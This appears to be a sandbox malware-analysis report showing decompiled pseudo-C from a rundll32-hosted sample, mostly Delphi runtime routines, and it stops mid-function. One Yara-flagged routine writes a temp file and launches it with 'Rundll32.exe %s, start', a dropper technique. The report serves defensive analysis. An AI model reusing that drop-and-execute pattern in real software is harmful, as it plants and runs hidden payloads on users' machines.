                                            • RtlDeleteCriticalSection.KERNEL32(001945C4,00181B09,003D76A8,00000000,00181B02), ref: 00181AFC
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                            • String ID:
                                            • API String ID: 3782394904-0
                                            • Opcode ID: 2b3347b9bd43728b970b18b7b2d21013aec4d1ba9aa51e48791c1a3070cdfaed
                                            • Instruction ID: ab004992efacd136f46bf6d73b70795b231a6346581ee702b7c057cebf6bedc5
                                            • Opcode Fuzzy Hash: 2b3347b9bd43728b970b18b7b2d21013aec4d1ba9aa51e48791c1a3070cdfaed
                                            • Instruction Fuzzy Hash: 7111DDB6A042807FEB29FBE5EC92F5677DDAB16700F558016F10487A91D7249E83CF14
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E001853B9(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
                                            				signed int _t6;
                                            				signed int _t7;
                                            				long _t10;
                                            				void* _t14;
                                            
                                            				_t14 = __ebx;
                                            				 *__edi =  *__edi + __ecx;
                                            				 *((intOrPtr*)(__eax - 0x1945b4)) =  *((intOrPtr*)(__eax - 0x1945b4)) + __eax - 0x1945b4;
                                            				 *0x193008 = 2;
                                            				 *0x194014 = 0x181168;
                                            				 *0x194018 = 0x181170;
                                            				 *0x194046 = 2;
                                            				 *0x194000 = E00184578;
                                            				if(E00182CB4() != 0) {
                                            					_t3 = E00182CE4();
                                            				}
                                            				E00182DA8(_t3);
                                            				 *0x19404c = 0xd7b0;
                                            				 *0x194218 = 0xd7b0;
                                            				 *0x1943e4 = 0xd7b0;
                                            				 *0x19403c = GetCommandLineA();
                                            				_t6 = E00181278();
                                            				 *0x194038 = _t6;
                                            				L00181270();
                                            				_t7 = _t6 & 0x80000000;
                                            				if(_t7 == 0x80000000) {
                                            					 *0x1945b8 = E001852F0(GetThreadLocale(), _t14, __eflags);
                                            				} else {
                                            					L00181270();
                                            					if((_t7 & 0x000000ff) <= 4) {
                                            						 *0x1945b8 = E001852F0(GetThreadLocale(), _t14, __eflags);
                                            					} else {
                                            						 *0x1945b8 = 3;
                                            					}
                                            				}
                                            				_t10 = GetCurrentThreadId();
                                            				 *0x194030 = _t10;
                                            				return _t10;
                                            			}








                                            APIs
                                              • Part of subcall function 00182CB4: GetKeyboardType.USER32 ref: 00182CB9
                                              • Part of subcall function 00182CB4: GetKeyboardType.USER32 ref: 00182CC5
                                            • GetCommandLineA.KERNEL32 ref: 0018541F
                                            • 734E569E.KERNEL32 ref: 00185433
                                            • 734E569E.KERNEL32 ref: 00185444
                                            • GetCurrentThreadId.KERNEL32 ref: 00185480
                                              • Part of subcall function 00182CE4: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00182D06
                                              • Part of subcall function 00182CE4: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00182D55,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00182D39
                                              • Part of subcall function 00182CE4: RegCloseKey.ADVAPI32(?,00182D5C,00000000,?,00000004,00000000,00182D55,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00182D4F
                                            • GetThreadLocale.KERNEL32 ref: 00185460
                                              • Part of subcall function 001852F0: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00185356), ref: 00185316
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: E569KeyboardLocaleThreadType$CloseCommandCurrentInfoLineOpenQueryValue
                                            • String ID:
                                            • API String ID: 2578515257-0
                                            • Opcode ID: e8f2452db18940056e722f63600ab63e56c80be294fab9ee6aae97cb5a52a6ee
                                            • Instruction ID: 0812f8db6dcd01e3de56bafbdf83a0162eae031e82eca22e800cb21e30f15ca7
                                            • Opcode Fuzzy Hash: e8f2452db18940056e722f63600ab63e56c80be294fab9ee6aae97cb5a52a6ee
                                            • Instruction Fuzzy Hash: BF0156B24047419BE720BFF4AC467593AA5FB22354F5A041BE64456673EB3803C7CF62
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 65%
                                            			E00182CE4() {
                                            				void* _v8;
                                            				char _v12;
                                            				int _v16;
                                            				signed short _t12;
                                            				signed short _t14;
                                            				intOrPtr _t27;
                                            				void* _t29;
                                            				void* _t31;
                                            				intOrPtr _t32;
                                            
                                            				_t29 = _t31;
                                            				_t32 = _t31 + 0xfffffff4;
                                            				_v12 =  *0x193020 & 0x0000ffff;
                                            				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
                                            					_t12 =  *0x193020; // 0x27f
                                            					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
                                            					 *0x193020 = _t14;
                                            					return _t14;
                                            				} else {
                                            					_push(_t29);
                                            					_push(E00182D55);
                                            					_push( *[fs:eax]);
                                            					 *[fs:eax] = _t32;
                                            					_v16 = 4;
                                            					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
                                            					_pop(_t27);
                                            					 *[fs:eax] = _t27;
                                            					_push(0x182d5c);
                                            					return RegCloseKey(_v8);
                                            				}
                                            			}













                                            APIs
                                            • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00182D06
                                            • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00182D55,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00182D39
                                            • RegCloseKey.ADVAPI32(?,00182D5C,00000000,?,00000004,00000000,00182D55,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00182D4F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: CloseOpenQueryValue
                                            • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                            • API String ID: 3677997916-4173385793
                                            • Opcode ID: 847eaa29db7e344422379f70c1730705dcb3e21127f6ac9cb7ae5acdacd419c4
                                            • Instruction ID: 267d2f44d4f8ccff69392dc84e46ba6a043e3a791d01447227e54c1125ed26f6
                                            • Opcode Fuzzy Hash: 847eaa29db7e344422379f70c1730705dcb3e21127f6ac9cb7ae5acdacd419c4
                                            • Instruction Fuzzy Hash: 3F017575A40708BAD712FBD0DD42BEDBBBCEB08B00F500661FA14D6590E7745B51CB54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 64%
                                            			E001897D4(void* __esi, void* __eflags) {
                                            				char _v8;
                                            				intOrPtr* _t18;
                                            				intOrPtr _t26;
                                            				void* _t27;
                                            				long _t29;
                                            				intOrPtr _t32;
                                            				void* _t33;
                                            
                                            				_t33 = __eflags;
                                            				_push(0);
                                            				_push(_t32);
                                            				_push(0x18986b);
                                            				_push( *[fs:eax]);
                                            				 *[fs:eax] = _t32;
                                            				E0018954C(GetThreadLocale(), 0x189880, 0x100b,  &_v8);
                                            				_t29 = E00186AC0(0x189880, 1, _t33);
                                            				if(_t29 + 0xfffffffd - 3 < 0) {
                                            					EnumCalendarInfoA(E00189720, GetThreadLocale(), _t29, 4);
                                            					_t27 = 7;
                                            					_t18 = 0x194768;
                                            					do {
                                            						 *_t18 = 0xffffffff;
                                            						_t18 = _t18 + 4;
                                            						_t27 = _t27 - 1;
                                            					} while (_t27 != 0);
                                            					EnumCalendarInfoA(E0018975C, GetThreadLocale(), _t29, 3);
                                            				}
                                            				_pop(_t26);
                                            				 *[fs:eax] = _t26;
                                            				_push(E00189872);
                                            				return E00183980( &_v8);
                                            			}











                                            APIs
                                            • GetThreadLocale.KERNEL32(?,00000000,0018986B,?,?,00000000), ref: 001897EC
                                              • Part of subcall function 0018954C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0018956A
                                            • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0018986B,?,?,00000000), ref: 0018981C
                                            • EnumCalendarInfoA.KERNEL32(Function_00009720,00000000,00000000,00000004), ref: 00189827
                                            • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0018986B,?,?,00000000), ref: 00189845
                                            • EnumCalendarInfoA.KERNEL32(Function_0000975C,00000000,00000000,00000003), ref: 00189850
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: Locale$InfoThread$CalendarEnum
                                            • String ID:
                                            • API String ID: 4102113445-0
                                            • Opcode ID: d157d7c4ec5c680bebe094e9e3fc0b69995ea596528d55378e2566704908474c
                                            • Instruction ID: 7877a1caf44029956df8431415983c08c65cfb8a2f933c1a42291b5f1e8ac7bf
                                            • Opcode Fuzzy Hash: d157d7c4ec5c680bebe094e9e3fc0b69995ea596528d55378e2566704908474c
                                            • Instruction Fuzzy Hash: 8701F230A00A48ABE711BA648C13F6E729DDBA7B14FA90560F511AA6D0E7649F008FA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 82%
                                            			E00189884(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                            				intOrPtr _v8;
                                            				char _v12;
                                            				intOrPtr _v16;
                                            				char _v20;
                                            				char _v24;
                                            				void* _t41;
                                            				signed int _t45;
                                            				signed int _t47;
                                            				signed int _t49;
                                            				signed int _t51;
                                            				intOrPtr _t75;
                                            				void* _t76;
                                            				signed int _t77;
                                            				signed int _t83;
                                            				signed int _t92;
                                            				intOrPtr _t111;
                                            				void* _t122;
                                            				void* _t124;
                                            				intOrPtr _t127;
                                            				void* _t128;
                                            
                                            				_t128 = __eflags;
                                            				_push(0);
                                            				_push(0);
                                            				_push(0);
                                            				_push(0);
                                            				_push(0);
                                            				_t122 = __edx;
                                            				_t124 = __eax;
                                            				_push(_t127);
                                            				_push(0x189a4e);
                                            				_push( *[fs:eax]);
                                            				 *[fs:eax] = _t127;
                                            				_t92 = 1;
                                            				E00183980(__edx);
                                            				E0018954C(GetThreadLocale(), 0x189a64, 0x1009,  &_v12);
                                            				if(E00186AC0(0x189a64, 1, _t128) + 0xfffffffd - 3 < 0) {
                                            					while(1) {
                                            						_t41 = E00183C1C(_t124);
                                            						__eflags = _t92 - _t41;
                                            						if(_t92 > _t41) {
                                            							goto L28;
                                            						}
                                            						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
                                            						asm("bt [0x193114], eax");
                                            						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
                                            							_t45 = E00186F5C(_t124 + _t92 - 1, 2, 0x189a68);
                                            							__eflags = _t45;
                                            							if(_t45 != 0) {
                                            								_t47 = E00186F5C(_t124 + _t92 - 1, 4, 0x189a78);
                                            								__eflags = _t47;
                                            								if(_t47 != 0) {
                                            									_t49 = E00186F5C(_t124 + _t92 - 1, 2, 0x189a90);
                                            									__eflags = _t49;
                                            									if(_t49 != 0) {
                                            										_t51 =  *(_t124 + _t92 - 1) - 0x59;
                                            										__eflags = _t51;
                                            										if(_t51 == 0) {
                                            											L24:
                                            											E00183C24(_t122, 0x189aa8);
                                            										} else {
                                            											__eflags = _t51 != 0x20;
                                            											if(_t51 != 0x20) {
                                            												E00183B68();
                                            												E00183C24(_t122, _v24);
                                            											} else {
                                            												goto L24;
                                            											}
                                            										}
                                            									} else {
                                            										E00183C24(_t122, 0x189a9c);
                                            										_t92 = _t92 + 1;
                                            									}
                                            								} else {
                                            									E00183C24(_t122, 0x189a88);
                                            									_t92 = _t92 + 3;
                                            								}
                                            							} else {
                                            								E00183C24(_t122, 0x189a74);
                                            								_t92 = _t92 + 1;
                                            							}
                                            							_t92 = _t92 + 1;
                                            							__eflags = _t92;
                                            						} else {
                                            							_v8 = E0018A7E8(_t124, _t92);
                                            							E00183E64(_t124, _v8, _t92,  &_v20);
                                            							E00183C24(_t122, _v20);
                                            							_t92 = _t92 + _v8;
                                            						}
                                            					}
                                            				} else {
                                            					_t75 =  *0x194740; // 0x9
                                            					_t76 = _t75 - 4;
                                            					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
                                            						_t77 = 1;
                                            					} else {
                                            						_t77 = 0;
                                            					}
                                            					if(_t77 == 0) {
                                            						E001839D4(_t122, _t124);
                                            					} else {
                                            						while(_t92 <= E00183C1C(_t124)) {
                                            							_t83 =  *(_t124 + _t92 - 1) - 0x47;
                                            							__eflags = _t83;
                                            							if(_t83 != 0) {
                                            								__eflags = _t83 != 0x20;
                                            								if(_t83 != 0x20) {
                                            									E00183B68();
                                            									E00183C24(_t122, _v16);
                                            								}
                                            							}
                                            							_t92 = _t92 + 1;
                                            							__eflags = _t92;
                                            						}
                                            					}
                                            				}
                                            				L28:
                                            				_pop(_t111);
                                            				 *[fs:eax] = _t111;
                                            				_push(E00189A55);
                                            				return E001839A4( &_v24, 4);
                                            			}
























                                            APIs
                                            • GetThreadLocale.KERNEL32(?,00000000,00189A4E,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 001898B3
                                              • Part of subcall function 0018954C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0018956A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: Locale$InfoThread
                                            • String ID: eeee$ggg$yyyy
                                            • API String ID: 4232894706-1253427255
                                            • Opcode ID: 52d2b2dd80f46ab30fe8c7e9a8e728bb42391d6ec7c0d4dd6ebc476206fdf50c
                                            • Instruction ID: d06ec677849a0ca4b3f4ec5a4c2f0b4429ff22f0d19ac4a7e01b84a797d184a8
                                            • Opcode Fuzzy Hash: 52d2b2dd80f46ab30fe8c7e9a8e728bb42391d6ec7c0d4dd6ebc476206fdf50c
                                            • Instruction Fuzzy Hash: 73412835B041054BC719BAA8C8922BEF3EADB95B04F6C1466F462E3306DB21DF029F21
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 86%
                                            			E001C3B30(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                            				char _v264;
                                            				char _v524;
                                            				char _v784;
                                            
                                            				GetTempPathA(0x104,  &_v524);
                                            				GetTempFileNameA( &_v524, "BN", 0,  &_v264);
                                            				if(E001C3AC0(_a4,  &_v264, _a4, _a8) != 1) {
                                            					return 0;
                                            				}
                                            				_push(_a8);
                                            				if(E001C33C0(_a4) != 1) {
                                            					return E001C36C0( &_v264);
                                            				}
                                            				wsprintfA( &_v784, "Rundll32.exe %s, start",  &_v264);
                                            				return E001C36C0( &_v784);
                                            			}







                                            APIs
                                            • GetTempPathA.KERNEL32(00000104,?), ref: 001C3B45
                                            • GetTempFileNameA.KERNEL32(?,001C42C0,00000000,?), ref: 001C3B60
                                              • Part of subcall function 001C3AC0: CreateFileA.KERNEL32(001C1691,40000000,00000000,00000000,00000002,00000080,00000000), ref: 001C3AE6
                                              • Part of subcall function 001C3AC0: WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 001C3B07
                                              • Part of subcall function 001C3AC0: CloseHandle.KERNEL32(000000FF), ref: 001C3B11
                                            • wsprintfA.USER32 ref: 001C3BAA
                                              • Part of subcall function 001C36C0: CreateProcessA.KERNEL32(00000000,001C3BD2,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 001C36F7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1c0000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$CreateTemp$CloseHandleNamePathProcessWritewsprintf
                                            • String ID: Rundll32.exe %s, start
                                            • API String ID: 130250823-2967502992
                                            • Opcode ID: f0f0216fd8791722fa0fd7a4ea1248eb632a30374cbe44f9c46d9da5e2277d8c
                                            • Instruction ID: 337c9b921d21bf798f447ebda7c37dff192c02a6746b7801e5bc96e0d5443e78
                                            • Opcode Fuzzy Hash: f0f0216fd8791722fa0fd7a4ea1248eb632a30374cbe44f9c46d9da5e2277d8c
                                            • Instruction Fuzzy Hash: A3118CB99041186BD710DB90FC96FE9737CAB74304F00C698FA5986141E771DB988B92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 77%
                                            			E0018B04C() {
                                            				struct HINSTANCE__* _t1;
                                            				struct HINSTANCE__* _t3;
                                            
                                            				_t1 = GetModuleHandleA("kernel32.dll");
                                            				_t3 = _t1;
                                            				if(_t3 != 0) {
                                            					_push("GetDiskFreeSpaceExA");
                                            					_push(_t3);
                                            					L00185740();
                                            					 *0x193138 = _t1;
                                            				}
                                            				if( *0x193138 == 0) {
                                            					 *0x193138 = E00186E8C;
                                            					return E00186E8C;
                                            				}
                                            				return _t1;
                                            			}






                                            APIs
                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,0018B975,00000000,0018B988), ref: 0018B052
                                            • 7248FFF6.KERNEL32(00000000,GetDiskFreeSpaceExA,kernel32.dll,?,0018B975,00000000,0018B988), ref: 0018B063
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: 7248HandleModule
                                            • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                            • API String ID: 3866045432-3712701948
                                            • Opcode ID: cf339014768ce2f856825d31b9e32929126e2e3a5a268a1ac2007c0a705d53d5
                                            • Instruction ID: 630335d0258677e84e83bafe9cbb7ea09765274447f368931fcac0bc66ffe845
                                            • Opcode Fuzzy Hash: cf339014768ce2f856825d31b9e32929126e2e3a5a268a1ac2007c0a705d53d5
                                            • Instruction Fuzzy Hash: E8D0C9A4609746AEE720BBB09CD2B1B35A9D711724FA00037B1205A672D7B58FC84F50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 82%
                                            			E0018CD54(intOrPtr* __eax) {
                                            				char _v260;
                                            				char _v768;
                                            				char _v772;
                                            				intOrPtr* _v776;
                                            				signed short* _v780;
                                            				char _v784;
                                            				signed int _v788;
                                            				char _v792;
                                            				intOrPtr* _v796;
                                            				signed char _t43;
                                            				intOrPtr* _t60;
                                            				void* _t79;
                                            				void* _t81;
                                            				void* _t84;
                                            				void* _t85;
                                            				intOrPtr* _t92;
                                            				void* _t96;
                                            				char* _t97;
                                            				void* _t98;
                                            
                                            				_v776 = __eax;
                                            				if(( *(_v776 + 1) & 0x00000020) == 0) {
                                            					E0018CC34(0x80070057);
                                            				}
                                            				_t43 =  *_v776;
                                            				if((_t43 & 0x00000fff) == 0xc) {
                                            					if((_t43 & 0x00000040) == 0) {
                                            						_v780 =  *((intOrPtr*)(_v776 + 8));
                                            					} else {
                                            						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
                                            					}
                                            					_v788 =  *_v780 & 0x0000ffff;
                                            					_t79 = _v788 - 1;
                                            					if(_t79 >= 0) {
                                            						_t85 = _t79 + 1;
                                            						_t96 = 0;
                                            						_t97 =  &_v772;
                                            						do {
                                            							_v796 = _t97;
                                            							_push(_v796 + 4);
                                            							_t22 = _t96 + 1; // 0x1
                                            							_push(_v780);
                                            							L0018BE44();
                                            							E0018CC34(_v780);
                                            							_push( &_v784);
                                            							_t25 = _t96 + 1; // 0x1
                                            							_push(_v780);
                                            							L0018BE4C();
                                            							E0018CC34(_v780);
                                            							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
                                            							_t96 = _t96 + 1;
                                            							_t97 = _t97 + 8;
                                            							_t85 = _t85 - 1;
                                            						} while (_t85 != 0);
                                            					}
                                            					_t81 = _v788 - 1;
                                            					if(_t81 >= 0) {
                                            						_t84 = _t81 + 1;
                                            						_t60 =  &_v768;
                                            						_t92 =  &_v260;
                                            						do {
                                            							 *_t92 =  *_t60;
                                            							_t92 = _t92 + 4;
                                            							_t60 = _t60 + 8;
                                            							_t84 = _t84 - 1;
                                            						} while (_t84 != 0);
                                            						do {
                                            							goto L12;
                                            						} while (E0018CCF8(_t83, _t98) != 0);
                                            						goto L15;
                                            					}
                                            					L12:
                                            					_t83 = _v788 - 1;
                                            					if(E0018CCC8(_v788 - 1, _t98) != 0) {
                                            						_push( &_v792);
                                            						_push( &_v260);
                                            						_push(_v780);
                                            						L0018BE54();
                                            						E0018CC34(_v780);
                                            						E0018CF4C(_v792);
                                            					}
                                            				}
                                            				L15:
                                            				_push(_v776);
                                            				L0018B9E0();
                                            				return E0018CC34(_v776);
                                            			}























                                            APIs
                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0018CE03
                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0018CE1F
                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0018CE96
                                            • VariantClear.OLEAUT32(?), ref: 0018CEBF
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: ArraySafe$Bound$ClearIndexVariant
                                            • String ID:
                                            • API String ID: 920484758-0
                                            • Opcode ID: d68851b79baf669237e5b1deb7cedb0c213449e6e11e02c7683a4bb073e56b58
                                            • Instruction ID: 716130d66e662901001e8c9ca2f47db09b1fd55e9fea527d8dbceb754a0e2e70
                                            • Opcode Fuzzy Hash: d68851b79baf669237e5b1deb7cedb0c213449e6e11e02c7683a4bb073e56b58
                                            • Instruction Fuzzy Hash: 2041F875A0161D9FCB61EB58CC91BC9B7BCAB58700F0042E5E648A7212DB34AF858FA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00189AB8(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
                                            				intOrPtr _v8;
                                            				intOrPtr _v12;
                                            				char _v273;
                                            				char _v534;
                                            				char _v790;
                                            				struct _MEMORY_BASIC_INFORMATION _v820;
                                            				char _v824;
                                            				intOrPtr _v828;
                                            				char _v832;
                                            				intOrPtr _v836;
                                            				char _v840;
                                            				intOrPtr _v844;
                                            				char _v848;
                                            				char* _v852;
                                            				char _v856;
                                            				char _v860;
                                            				char _v1116;
                                            				void* __edi;
                                            				struct HINSTANCE__* _t40;
                                            				intOrPtr _t51;
                                            				struct HINSTANCE__* _t53;
                                            				void* _t69;
                                            				void* _t73;
                                            				intOrPtr _t74;
                                            				intOrPtr _t83;
                                            				intOrPtr _t86;
                                            				intOrPtr* _t87;
                                            				void* _t93;
                                            
                                            				_t93 = __fp0;
                                            				_v8 = __ecx;
                                            				_t73 = __edx;
                                            				_t87 = __eax;
                                            				VirtualQuery(__edx,  &_v820, 0x1c);
                                            				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
                                            					_t40 =  *0x194660; // 0x180000
                                            					GetModuleFileNameA(_t40,  &_v534, 0x105);
                                            					_v12 = E00189AAC(_t73);
                                            				} else {
                                            					_v12 = _t73 - _v820.AllocationBase;
                                            				}
                                            				E00186F28( &_v273, 0x104, E0018A938(0x5c) + 1);
                                            				_t74 = 0x189c38;
                                            				_t86 = 0x189c38;
                                            				_t83 =  *0x185b74; // 0x185bc0
                                            				if(E00182FD0(_t87, _t83) != 0) {
                                            					_t74 = E00183E0C( *((intOrPtr*)(_t87 + 4)));
                                            					_t69 = E00186F00(_t74, 0x189c38);
                                            					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
                                            						_t86 = 0x189c3c;
                                            					}
                                            				}
                                            				_t51 =  *0x193578; // 0x185924
                                            				_t16 = _t51 + 4; // 0xffe7
                                            				_t53 =  *0x194660; // 0x180000
                                            				LoadStringA(E00184840(_t53),  *_t16,  &_v790, 0x100);
                                            				E00182DBC( *_t87,  &_v1116);
                                            				_v860 =  &_v1116;
                                            				_v856 = 4;
                                            				_v852 =  &_v273;
                                            				_v848 = 6;
                                            				_v844 = _v12;
                                            				_v840 = 5;
                                            				_v836 = _t74;
                                            				_v832 = 6;
                                            				_v828 = _t86;
                                            				_v824 = 6;
                                            				E00187448(_v8,  &_v790, _a4, _t93, 4,  &_v860);
                                            				return E00186F00(_v8, _t86);
                                            			}
































                                            APIs
                                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00189AD5
                                            • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00189AF9
                                            • GetModuleFileNameA.KERNEL32(00180000,?,00000105), ref: 00189B14
                                            • LoadStringA.USER32 ref: 00189BAA
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.3150641576.0000000000181000.00000020.00020000.sdmp, Offset: 00180000, based on PE: true
                                            • Associated: 00000003.00000002.3150636288.0000000000180000.00000002.00020000.sdmp
                                            • Associated: 00000003.00000002.3150651430.0000000000193000.00000004.00020000.sdmp
                                            • Associated: 00000003.00000002.3150656817.0000000000196000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_180000_rundll32.jbxd
                                            Similarity
                                            • API ID: FileModuleName$LoadQueryStringVirtual
                                            • String ID:
                                            • API String ID: 3990497365-0
                                            • Opcode ID: 544af031ec4980e56a3da135131882cf7afbf85bee8eda6bef3ad31869c03b2a
                                            • Instruction ID: c82c699dc1d98eba2fb5402f388904f2100256c999c943c866c3fef3a3683ab9
                                            • Opcode Fuzzy Hash: 544af031ec4980e56a3da135131882cf7afbf85bee8eda6bef3ad31869c03b2a
                                            • Instruction Fuzzy Hash: E0414C70A002589BDB21EBA8DC85BDEB7FDAB19310F4440EAE508E7252D7749F848F50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00189AB6(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                            				intOrPtr _v8;
                                            				intOrPtr _v12;
                                            				char _v273;
                                            				char _v534;
                                            				char _v790;
                                            				struct _MEMORY_BASIC_INFORMATION _v820;
                                            				char _v824;
                                            				intOrPtr _v828;
                                            				char _v832;
                                            				intOrPtr _v836;
                                            				char _v840;
                                            				intOrPtr _v844;
                                            				char _v848;
                                            				char* _v852;
                                            				char _v856;
                                            				char _v860;
                                            				char _v1116;
                                            				void* __edi;
                                            				struct HINSTANCE__* _t40;
                                            				intOrPtr _t51;
                                            				struct HINSTANCE__* _t53;
                                            				void* _t69;
                                            				void* _t74;
                                            				intOrPtr _t75;
                                            				intOrPtr _t85;
                                            				intOrPtr _t89;
                                            				intOrPtr* _t92;
                                            				void* _t105;
                                            
                                            				_v8 = __ecx;
                                            				_t74 = __edx;
                                            				_t92 = __eax;
